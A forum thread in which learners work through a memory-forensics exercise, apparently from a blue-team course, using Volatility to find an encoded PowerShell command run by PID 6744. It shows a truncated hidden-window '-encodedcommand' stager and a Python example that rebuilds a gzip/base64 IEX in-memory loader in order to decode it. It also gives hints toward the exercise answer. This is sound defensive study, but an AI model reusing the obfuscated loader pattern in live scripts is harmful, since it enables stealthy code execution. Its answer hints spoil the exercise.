Practical Digital Forensics Scenario

Hi guys,
I’m struggling with this one.

Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework) has been utilized within the process, and enter its name as your answer.

I noted that the command was triggered with base64 encoding, so the answer should be (I assume) copied and pasted from the GitHub link provided, but I’m not able to progress at all.

Any hints?

The encoded command can be decoded to reveal the answer. It’s the name of one of the techniques available on the webpage, starting with P.

I’m also stuck here. Any guide please?

Try this way - It performs network enumeration and exploitation.

I found the answer, but I need to validate the answer. Can someone explain how we arrive at both answers for the questions in the section?

Hi. I found the solution but I just guessed it. I found the PowerShell command with the base64 and when I decoded it, I finally found executable code but nothing about the module used.


That’s the problem with some of the modules, I didn’t like it. I completed the entire blue team course; if you get stuck feel free to reach me via PM.

Hello. I kindly need assistance. I have been stuck here for days: (Practical Digital Forensics Scenario)
Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework) has been utilized within the process, and enter its name as your answer.

Please check all the answers provided in this thread, there are many hints.

I just finished this a while ago.
First, identify any PowerShell commands or scripts executed by the process with PID 6744 in the memory dump; you can use Volatility’s windows.cmdline plugin.

command -
python vol.py -f …\memdump\PhysicalMemory.raw windows.cmdline.CmdLine | findstr 6744

It will show you a result something like this -

C:\Users\johndoe\Desktop\volatility3-develop>python vol.py -f …\memdump\PhysicalMemory.raw windows.cmdline.CmdLine | findstr 6744
6744 powershell.exe "PowerShell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAVwBhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADIAZwBKAFUAQgBNAEcAYgBDAEQATgBHADcAWAAwAEQATQBiAHMAUwB5AEEAcwBkAGwANABVAGwAYwB1AEYASwBlAEsAMQBYAEEAYgBEAG0ALwBmAGYANQA1AGEAQgBkAEgAbwA2AFAAZABQAFMAegBFAFMASwBxAEgATABkADUAZABTADUAUwA5ADAANQA0AFgAZA

Second - this is base64; decode it using any tool like PowerShell, CyberChef or Burp Suite. Me, I asked ChatGPT to decode it for me, then I asked GPT to explain it too.

Third - look for the result in the GitHub repo.
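The decoding steps above, carried through in Python as an added example (not from the original post): layer one is the -encodedcommand argument, which is base64 of UTF-16LE text; layer two is the FromBase64String("H4sI...") literal in the decoded loader, where H4sI is the base64 form of the gzip magic bytes, so the blob is gunzipped to recover the inner script. The command line and inner script used here are constructed stand-ins for the cmdline output shown above; the Verb-Noun names the last function pulls out are what you would compare against the PowerSploit function list.

```python
import base64
import gzip
import re

# Constructed sample inner script (stands in for whatever the real stager ran).
INNER_SCRIPT = "Write-Output 'constructed sample'; Get-Date | Out-Null"


def build_encoded_command(inner: str) -> str:
    """Wrap a script in the MemoryStream/FromBase64String/GzipStream loader
    pattern seen in the cmdline output, then encode it the way PowerShell's
    -encodedcommand expects (base64 over UTF-16LE). Used only to build the sample."""
    gz = base64.b64encode(gzip.compress(inner.encode("utf-8"))).decode()
    loader = ('$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"));'
              'IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,'
              '[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();' % gz)
    return base64.b64encode(loader.encode("utf-16-le")).decode()


def extract_encoded_arg(cmdline: str) -> str:
    """Pull the blob following -e/-enc/-encodedcommand out of a cmdline line."""
    m = re.search(r"-e\w*\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        raise ValueError("no -encodedcommand argument found")
    return m.group(1)


def decode_encoded_command(enc: str) -> str:
    """Layer 1: base64 -> UTF-16LE text (the loader script)."""
    return base64.b64decode(enc).decode("utf-16-le")


def unwrap_gzip_layers(script: str) -> list:
    """Layer 2: every FromBase64String("...") literal is decoded; if it starts
    with the gzip magic 1f 8b it is decompressed. Returns the inner scripts."""
    inner = []
    for blob in re.findall(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', script):
        raw = base64.b64decode(blob)
        if raw[:2] == b"\x1f\x8b":
            raw = gzip.decompress(raw)
        inner.append(raw.decode("utf-8", errors="replace"))
    return inner


def cmdlet_names(script: str) -> list:
    """Verb-Noun identifiers to look up in the PowerSploit repository."""
    return sorted(set(re.findall(r"\b[A-Z][a-z]+-[A-Z][A-Za-z]+\b", script)))


# Constructed cmdline line in the same shape as the Volatility output above.
SAMPLE_CMDLINE = ('6744 powershell.exe "PowerShell.exe" -nop -w hidden '
                  '-encodedcommand ' + build_encoded_command(INNER_SCRIPT))
```

Run the three decode functions in sequence on SAMPLE_CMDLINE (or on the real cmdline line) and pass the recovered inner script to cmdlet_names.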

I have worked out that the result is Out-EncodedCommand but don’t know why it’s not accepting it. Any other hints?


It’s simpler than this, just use the provided site with metasploit tools and try to find the adequate tool name that "performs network enumeration and exploitation".

This question isn’t ideal.